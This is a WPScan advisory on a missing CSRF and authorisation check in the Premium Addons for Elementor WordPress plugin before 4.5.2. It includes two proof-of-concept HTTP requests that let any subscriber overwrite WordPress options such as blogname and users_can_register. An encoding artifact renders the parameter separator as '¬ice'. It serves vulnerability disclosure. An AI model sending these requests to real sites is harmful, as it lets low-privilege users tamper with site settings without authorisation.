WordPress Plugin Vulnerabilities
Premium Addons for Elementor < 4.5.2 - Subscriber+ Arbitrary Blog Option Update
Description
The plugin does not have any CSRF and authorisation checks in the pa_dismiss_admin_notice AJAX action, available to any authenticated users, and do not validate the option key to ensure the option to update belongs to the plugin. As a result, any authenticated user, such as subscriber can update arbitrary WordPress options and set them to the value '1'. An attacker changing the users_can_register would enable users registration, other options could be changed to make the blog unusable as well.
Proof of Concept
Change the Blogname to '1' POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 46 Cookie: [any authenticated user] Connection: close action=pa_dismiss_admin_notice¬ice=blogname To enable registration: POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 46 Cookie: [any authenticated user] Connection: close action=pa_dismiss_admin_notice¬ice= users_can_register
Affects Plugins
Fixed in 4.5.2 Classification
Type
ACCESS CONTROLS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
WPScanTeam
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-08-30 (about 2 years ago)
Added
2021-08-30 (about 2 years ago)
Last Updated
2021-08-30 (about 2 years ago)
WPScan 